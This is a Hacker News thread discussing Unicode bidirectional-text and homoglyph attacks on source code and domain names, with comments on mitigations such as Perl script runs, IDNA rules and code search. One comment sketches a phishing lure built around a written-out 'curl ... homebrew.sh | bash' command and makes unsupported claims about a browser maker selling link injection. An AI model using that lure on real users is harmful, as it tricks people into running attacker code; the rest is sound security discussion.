           | 
           | You can't (any more)1. That worked for a limited amount of
           | time, then mitigations were put in place, and subsequently
           | standardised as part of Unicode. Everyone who deals with
           | implementations of Unicode is supposed to be knowledgeable
           | about the security relevant aspects, you can bet that the
           | people working on browsers definitely are.
           | <http://p3rl.org/perlre#Script-Runs>
           | 
           | 1 invitation to prove me wrong, I am on purpose leaning far
           | out the metaphoric window and will gladly eat my words
        
             | Amorymeltzer wrote:
             | Came here to provide exactly that link (canonical:
             | <https://perldoc.perl.org/perlre#Script-Runs>). For those
             | who figured they'd skip over it, it's pretty neat IMO. Perl
             | 5.28 (released 2018) added a new technique for matching
             | patterns that aren't all from the same Unicode script, a
             | "script run."
             | 
             | >In most places a single word would never be written in
             | multiple scripts, unless it is a spoofing attack. An
             | infamous example, is
             | 
             | >>paypal.com
             | 
             | >Those letters could all be Latin (as in the example just
             | above), or they could be all Cyrillic (except for the dot),
             | or they could be a mixture of the two. In the case of an
             | internet address the .com would be in Latin, And any
             | Cyrillic ones would cause it to be a mixture, not a script
             | run.
        
             | kingcharles wrote:
             | > You can't (any more)1.
             | 
             | That was my understanding too, until this last week when I
             | figured out you could.
             | 
             | I'm pretty certain this: and this: are the same rendering,
             | but are different Unicode, and I can register them both as
             | domain names under some TLDs. Google displays them the same
             | in their result pages too.
        
               | bmn__ wrote:
               | I examined closely and found both are exactly the same, a
               | perfectly valid Latin script run and equivalent to the
               | expression in escape notation
               | "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}".
               | > perl -C -E'print
               | "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
               | 0000  74 68 69 73 3a
               | this:
               | 
               | HN software likely ate the relevant details you wanted to
               | show, can you please try again and use a notation that
               | survives the HN filter?
        
               | kingcharles wrote:
               | Try this: https://kingcharles.one/unistrange.html
               | 
               | When I created the file in Notepad it showed the hidden
               | code, but I can register both those as valid domains and
               | Google will show them identically in the SERPs, and
               | Safari will show them both identically in the address
               | bar. Chrome/Edge expands them in the address bar, but
               | will render them the same in HTML. Have not tested on
               | Firefox.
               | 
               | If you View Source in Chrome it won't show the hidden
               | code, but if you open the dev tools it will start to
               | break.
        
             | _3u10 wrote:
             | Doesn't really matter. The major browser is intentionally
             | security compromised, anyway.
             | 
             | If you pay the maker of the that browser they'll inject any
             | links you want on most pages on the internet. Just give
             | them the hash of the email / phone number of your target.
             | It helps both economically and passing their security
             | checks if you have more than a thousand victims you want to
             | target.
             | 
             | If you want to fool a developer just host it on a github
             | page. If you want to fool anyone else, just do a decent
             | clone of their page.
             | 
             | If you want it to appear on most major news network sites,
             | just pay $150 for a newswire.
             | 
             | Think about it, if you crafted the right article, maybe
             | about a fork of homebrew etc, and redirected to a github
             | page with a link stating you needed to copy and paste
             | 
             | curl http://github.com/asdkfjas/homebrew.sh | bash
             | 
             | into their terminals how many would do it?
        
           | KennyBlanken wrote:
           | > You're right - their headline is written for attention
           | 
           | That or just ignorance. Krebs has zero training or education
           | in computer science or programming.
        
         | josephcsible wrote:
         | It's a feature for prose text, so programs like Word should
         | support it. It's a security bug in anything designed to be
         | parsed or interpreted by software, so programs like Visual
         | Studio Code should refuse to honor it.
        
           | asddubs wrote:
           | or it should be confined to the marker of the string (i.e.
           | the quotation marks) if you're doing syntax highlighting
           | anyway
        
           | hollerith wrote:
           | Brilliant! Nobody would copy prose, then paste it into a code
           | file or REPL without re-reading it after the paste.
        
         | ximeng wrote:
         | https://github.com/rust-lang/rust/issues/28979 plenty of
         | discussion here on Unicode including homoglyph attacks. This is
         | for Rust but has links to Go and Zig. The Unicode standard also
         | has extensive discussion, for example
         | https://unicode.org/reports/tr31/ and
         | http://unicode.org/reports/tr39/ on identifiers and security.
         | 
         | In general a multilayer solution is needed: compilers, linters,
         | Unicode standard, merge tools, editors, and so on.
        
           | rurban wrote:
           | But they still don't get it right, they explicitly allow not
           | identifiable Unicode identifiers. The C20 committee recently
           | allowed also insecure identifiers, completely ignoring the
           | Unicode identifier guidelines. They stated that nobody cares,
           | everybody wants them and making them secure would need the
           | entire Unicode database. Why do they allow noobs into such
           | committees? What is needed are the normalization tables
           | (tiny), the script list (tiny) and the two xid lists.
        
             | estebank wrote:
             | > they explicitly allow not identifiable Unicode
             | identifiers. [...] They stated that nobody cares, everybody
             | wants them and making them secure would need the entire
             | Unicode database.
             | 
             | Could you elaborate? rustc ships with the entire Unicode db
             | and only allows indents with codepoints advertised by
             | Unicode as allowed in indents.
             | 
             | The closest to walking off the beaten path is a (still
             | unmerged) parser recovery PR that accepts emojis as
             | identifiers _if and only if_ a parse error would otherwise
             | occur as a way to avoid knock down errors when someone
             | tries to use them.
        
         | Animats wrote:
         | What's needed is to impose on programming languages, outside of
         | comments, checks similar to the checks made for domain names.
         | 
         | There is a draft standard for this.[1] It references RFC 5893
         | and some other documents. Some of the rules:
         | 
         | - All code points in a single label must be taken from the same
         | script as determined by the Unicode Standard Annex #24: Script
         | Names. Exceptions to this guideline are permissible for
         | languages with established orthographies and conventions that
         | require the commingled use of multiple scripts. (Like mixing
         | kanji and romaji in Japanese.)
         | 
         | - The "Bidi rules" of RFC 5893, which define allowed right to
         | left and left to right modes, must be enforced. These are
         | complicated, because of such things as the Arabic and Hebrew
         | convention of right to left text with left to right numeric
         | digits in numbers. But they are well-defined.
         | 
         | - Only code points allowed by IDNA 2008 are allowed. This
         | eliminates such things as the non-breaking zero width space,
         | the expansion areas for future use, and such.
         | 
         | The domain name people have been banging on this problem since
         | 2003, and by now, there's a rough consensus of what to
         | disallow. So start putting checks for that in compilers. If you
         | find violations of those rules, it's more likely to be a typo
         | than something useful, anyway.
         | 
         | So that's a way out of this.
         | 
         | [1] https://www.icann.org/en/system/files/files/draft-idn-
         | guidel...
        
           | varajelle wrote:
           | > What's needed is to impose on programming languages,
           | outside of comments, checks similar to the checks made for
           | domain names.
           | 
           | But this attack works by placing characters inside comments
           | and srings. So these checks would not help preventing this
           | particular attack.
        
             | Animats wrote:
             | They say that, but don't really justify that claim. That's
             | more about string literals that do something other than
             | just display, such as URLs.
        
         | asddubs wrote:
         | browsers have solved it for domain names. you could apply the
         | same heuristics for not mixing e.g. cyrillic and non cyrillic
         | in the same word/file
        
       | a-dub wrote:
       | wasn't there something a while back where people were triggering
       | buffer overflows in terminal emulators with malicious (and
       | invisible to the pretty printed eye) escape codes?
        
       | banana_giraffe wrote:
       | For anyone that wants to see the real code:
       | 
       | https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...
       | 
       | I've not seen one editor yet that doesn't at least hint there's a
       | problem with syntax highlighting, if not just outright show
       | nonsense.
        
       | user2994cb wrote:
       | I'm sure there are some creative uses in C-style comments for
       | U+2215, Division Slash: /
        
       | sqs wrote:
       | Code search is helpful to see if any of your code contains these
       | characters.
       | 
       | A bunch of hits found across the top ~2M open-source
       | repositories:
       | https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
       | 
       | To triage, you probably want to first look at hits in code files
       | (not JSON or Markdown, etc.):
       | 
       | https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
       | 
       | You can set up a self-hosted instance of Sourcegraph to run this
       | across all of your company's code: https://docs.sourcegraph.com/.
        
       | mwcampbell wrote:
       | > So you can use them in source code that appears innocuous to a
       | human reviewer
       | 
       | To a sighted human reviewer. If I'm not mistaken, a blind
       | programmer using a screen reader would be immune to this trick.
        
         | brazzy wrote:
         | If the screen reader understands Bidi (which it needs to in
         | order to support some languages), maybe not.
        
       | afrcnc wrote:
       | Duplicate: https://news.ycombinator.com/item?id=29061987
        
       | Groxx wrote:
       | Ehhhh... Interesting philosophically, and we might see a
       | practical attack maybe eventually, but most source code editors
       | and diff reviewers that I've encountered show all non-printable
       | characters VERY visibly. Because they matter, and always have -
       | "func asdf()" is very different from "func as<zwsp>df()". If I
       | saw a pile of non-printable control characters intermixed in code
       | in a diff, there's absolutely no way I'd allow that merge.
       | 
       | IOCCC entries will absolutely become more fun though.
        
         | lifthrasiir wrote:
         | > IOCCC entries will absolutely become more fun though.
         | 
         | IOCCC doesn't allow unescaped octets with high bit set [1], so
         | even that's no go.
         | 
         | [1] https://www.ioccc.org/2020/rules.txt (rule 13)
        
           | GlitchMr wrote:
           | Well, technically the rule only talks about entries that
           | "fail to compile". An entry that still compiles is fine, see
           | rule 12. In practice this means the Unicode abuse like this
           | is only allowed in strings.
        
             | lifthrasiir wrote:
             | When the rule was originally introduced in 2001 [1] it was
             | a total ban. It seems that the rule was slightly relaxed in
             | 2013 [2], but I think it still massively discourages any
             | octet >= 128 because there is no portable way to set the
             | input encoding (like GCC `-finput-charset`, which is
             | ignored by Clang AFAIK).
             | 
             | [1] https://www.ioccc.org/2001/rules
             | 
             | [2] https://www.ioccc.org/2013/rules.txt
        
           | Groxx wrote:
           | Aww. But also _of course_ they 've already addressed this.
        
           | saagarjha wrote:
           | I am very curious which program abused this and forced the
           | creation of that rule.
        
             | lifthrasiir wrote:
             | Probably 2000/briddlebane [1]. But it is more like a guard
             | against compatibility issues.
             | 
             | [1] https://www.ioccc.org/2000/briddlebane.c vs.
             | https://www.ioccc.org/2000/briddlebane.orig.c
        
         | [deleted]
        
         | Jach wrote:
         | I wouldn't be so sure about visibility since it seems most code
         | editors and programming languages want to support more unicode,
         | not less... One of my hobbies used to be annually running a
         | regex search through the company's millions of lines of java to
         | see how much of an increase there was in non-printable spaces
         | (0x200b) in java method names or other symbols. Eclipse at
         | least wouldn't show them by default, I don't remember
         | IntelliJ's behavior, but most people wouldn't know they were
         | there. I was aware of only one time when it impacted someone
         | who typed in a whole identifier by sight but the reference
         | included a 200b and they were stuck for a bit figuring out why
         | things didn't work.
         | 
         | But I agree the trick (hard to call it an attack or even bug)
         | is fun, in the same way as the earlier tricks of fake filename
         | extensions. And terribly obvious, even with the limitations of
         | default code viewers, and with no plausible deniability once
         | caught, so it's pretty overblown for practical considerations.
         | The intentionally introduced Linux kernel bugs from several
         | months ago were far more significant a lesson for people to
         | learn from, and they didn't rely on any unicode tricks but on
         | much simpler tricks that were also somewhat plausibly deniable
         | to chalk up to an oopsie.
        
           | Groxx wrote:
           | yeah, I've had an identifier or two like that in Ruby in the
           | past :) always worth a few facepalm-riddled lols when sharing
           | the final result with the rest of the team, especially since
           | it often meant they copied the func from Stack Overflow or
           | some equivalent.
           | 
           | Most of what I've encountered though has been due to a _lack_
           | of unicode support, and related growing pains in adopting
           | full UTF-8. E.g. much of the Eclipse issues I saw were due to
           | UTF-16 weirdness and stuff encoded in ShiftJIS or whatever
           | flavor of Windows encoding you used, and all those garbled
           | files due to missing magic-encoding-bytes in files. UTF-8
           | support  "completing" in tools largely cleaned all that up,
           | since they detected the encoding, converted to UTF-8, and
           | showed abnormal stuff as the abnormalities they were all
           | along.
           | 
           | I mean, that's probably because taking a deep look at
           | supporting UTF-8 meant taking a deep look at many of their
           | latent text bugs and finally fixing them, but it still
           | happened around the same time, and "X editor now supports
           | UTF-8" also marked a dramatic increase in "... and now shows
           | <nbsp> explicitly!" and similar things.
        
       | alanhaha wrote:
       | Will this also fool formatter?
       | 
       | Actually I think the format of the example in
       | https://www.trojansource.codes/ is too strange that I would like
       | committer to fix.
        
       | littlestymaar wrote:
       | Something puzzles me: this kind of tricks would definitely break
       | syntax highlighting, wouldn't it?
        
         | [deleted]
        
       | sqs wrote:
       | This issue has been raised before, such as at
       | https://github.com/golang/go/issues/20209 (I was reminded of that
       | by
       | https://twitter.com/peter_szilagyi/status/145515080347229798...).
       | There is some other interesting discussion there.
        
       | dathinab wrote:
       | I would say less that they discovered a new vulnerability but
       | they they but needed focus on a long term known problem.
       | 
       | It's just that many people while knowing the problem never
       | considered that it could be used in supply chain attacks.
        
       ___________________________________________________________________
       (page generated 2021-11-01 23:02 UTC)